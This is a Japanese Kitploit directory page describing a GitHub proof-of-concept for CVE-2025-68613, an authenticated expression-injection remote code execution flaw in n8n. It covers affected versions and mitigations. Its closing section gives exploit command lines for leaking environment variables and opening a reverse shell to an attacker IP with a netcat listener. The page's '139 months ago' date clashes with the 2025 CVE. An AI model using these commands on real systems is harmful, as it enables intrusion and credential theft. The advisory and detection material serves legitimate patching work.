Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/sahilccras/blackash-cve-2025-68613
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubsahilccras/blackash-cve-2025-68613

Blackash-CVE-2025-68613

CVE-2025-68613

リポジトリを見る
139ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2025-68613 — n8n における重大なRCE

n8nblog

重要度: 🔴 重大 影響: リモートコード実行 影響を受けるプラットフォーム: n8n (ワークフロー自動化)


🧩 概要

CVE-2025-68613 は、n8n(オープンソースのワークフロー自動化プラットフォーム)における重大なセキュリティ脆弱性です。 この問題により、認証された攻撃者がワークフロー式の評価方法を悪用して、サーバー上で任意のコードを実行できる可能性があります。


🎯 脆弱性の詳細

  • タイプ: 式インジェクション → リモートコード実行
  • CWE: CWE-913 — 動的に管理されるコードリソースの不適切な制御
  • 攻撃ベクトル: ネットワーク
  • 必要な権限: 低 (認証されたユーザー)
  • ユーザー操作: 不要
  • 影響の範囲: 変更

💥 危険な理由: 悪意のある式が適切にサンドボックス化されていないコンテキストで評価され、基盤となるランタイムへのアクセスが可能になります。


🧨 潜在的な影響

G8vg8GbXkAAJan2

悪用された場合、攻撃者は以下を行う可能性があります:

  • 🖥️ 任意のシステムコマンドを実行
  • 🔐 認証情報、トークン、シークレットを盗む
  • 🧬 ワークフローの改ざんまたはバックドア化
  • 📤 機密データを流出
  • 💣 n8nホストを完全に侵害

この攻撃はn8nサービスと同じ権限で実行されるため、影響が増幅されます。


📊 深刻度指標

指標値
CVSS v3.1~9.9–10.0
機密性高
完全性高
可用性高

➡️ 認証が必要ですが、管理者アクセスは不要です。


🧪 影響を受けるバージョン

🚫 脆弱なバージョン:

  • 0.211.0 → 1.120.3
  • 1.121.0

✅ 修正済み:

  • 1.120.4
  • 1.121.1
  • 1.122.0 以降

🛠️ 修復と緩和策

✅ 推奨(最良の選択肢)

  • 直ちにアップグレードして修正バージョンに更新

⚠️ 一時的なリスク軽減

(脆弱性を完全に取り除くものではありません)

  • ワークフローの作成・編集を信頼できるユーザーのみに制限
  • n8nを最小限のOS権限で実行
  • サービスを隔離(コンテナ、VM、制限されたファイルシステム)
  • ネットワーク露出を制限(VPN、ファイアウォールルール)
  • ログを有効にし、ワークフローの変更を監視

🧠 クイックリファレンス

カテゴリ情報
CVE IDCVE-2025-68613
製品n8n
バグクラス式インジェクション
結果リモートコード実行
必要なアクセス認証されたユーザー
修正の有無あり


✅ CVE-2025-68613.py — リモートバージョンおよび露出チェッカー(安全)

🧪 使用例

sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678

出力例

[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

このスクリプトの実行方法

  1. Nuclei をダウンロードしてインストールします。
  2. このリポジトリをローカルシステムにクローンします。
  3. 次のコマンドを実行します:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678

または、ホストのリストをスキャンする場合は、以下を実行します:

┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt

出力例

nuclei

使用例:

  • 環境変数の漏洩:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak

  • ユーザー情報の取得:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id

  • リバースシェル(先にリスナーを起動: nc -lvnp 4444):
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444

このスクリプトは、所有しているシステム、または明示的なテスト許可があるシステムにおいて、許可されたセキュリティテストのみを目的としています。


⚠️ 免責事項 ⚠️

🔒 このスクリプトは、n8n の CVE-2025-68613 に対する Proof-of-Concept (PoC) エクスプロイトです。

📚 これは教育目的および許可されたセキュリティテストにのみ提供されます。

🛡️ 所有、管理、または明示的な書面による許可を得たシステムでのみ排他的に使用してください。

🚫 いかなるシステムに対する無断使用は違法であり、法律(例:コンピュータ詐欺および不正行為法)に違反する可能性があります。

❌ 著者および関連当事者は、誤用、損害、法的結果について一切の責任を負いません。

✅ 責任を持って、倫理的に、適用されるすべての法律および規制に完全に準拠して使用してください。

🔐 ペネトレーションテストを実施する場合は、適切な許可(例:実施基準)が得られていることを確認してください。

🛠️ セキュリティ研究者は、脆弱性の確認と迅速なパッチ適用を促進するためにこれを使用できます。


ツールをダウンロード